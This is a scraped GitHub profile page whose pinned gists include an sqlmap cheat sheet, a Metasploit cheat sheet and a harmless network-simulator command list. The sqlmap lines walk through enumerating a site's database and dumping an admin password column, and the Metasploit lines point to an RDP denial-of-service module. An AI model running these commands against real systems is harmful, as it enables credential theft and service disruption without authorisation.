Skip to content
View khalikarifin's full-sized avatar

Block or report khalikarifin

Block user

Prevent this user from interacting with your repositories and sending you notifications. Learn more about blocking users.

You must be logged in to block users.

Please don't include any personal information such as legal names or email addresses. Maximum 100 characters, markdown supported. This note will be visible to only you.
Report abuse

Contact GitHub support about this user’s behavior. Learn more about reporting abuse.

Report abuse

Pinned Loading

  1. SQL Map Cheatset SQL Map Cheatset
    1
    [find database] #sqlmap -u http://target.com/index.php?id=1 --dbs
    2
    [find tables]   #sqlmap -u http://target.com/index.php?id=1 -D database_target --tables
    3
    [find columns]  #sqlmap -u http://target.com/index.php?id=1 -D database_target -T admin --columns
    4
    [dump columns]  #sqlmap -u http://target.com/index.php?id=1 -D database_target -T admin -C admin_pass --dump
    5
    
                  
  2. Metasploit Cheatset Metasploit Cheatset
    1
    #msfconsole (Run the Metasploit connected with Postgre Sql)
    2
    #msf > banner (Just for change the banner)
    3
    
                  
    4
    msf > search ms12 (Seacrh Exploit all about u need)
    5
    msf > info auxiliary/dos/windows/rdp/ms12_020_maxchannelids (Find more info about this Exploit)
  3. Virtual PC Simulator is a program wr... Virtual PC Simulator is a program written by Paul Meng, which allows you to simulate a lightweight PC supporting DHCP and ping. It consumes only 2MB of RAM per instance, and does not require an additional image.
    1
    >ip dhcp (dapatkan ip dari dhcp server / mode dhcp client)
    2
    >dhcp (dapatkan ip dari dhcp server / mode dhcp client)
    3
    >ip 192.168.1.10 255.255.255.0 192.168.1.1 (set IP static)
    4
    >ip dns 8.8.8.8 (set dns)
    5
    >show ip (tampilkan konfig IP addressnya)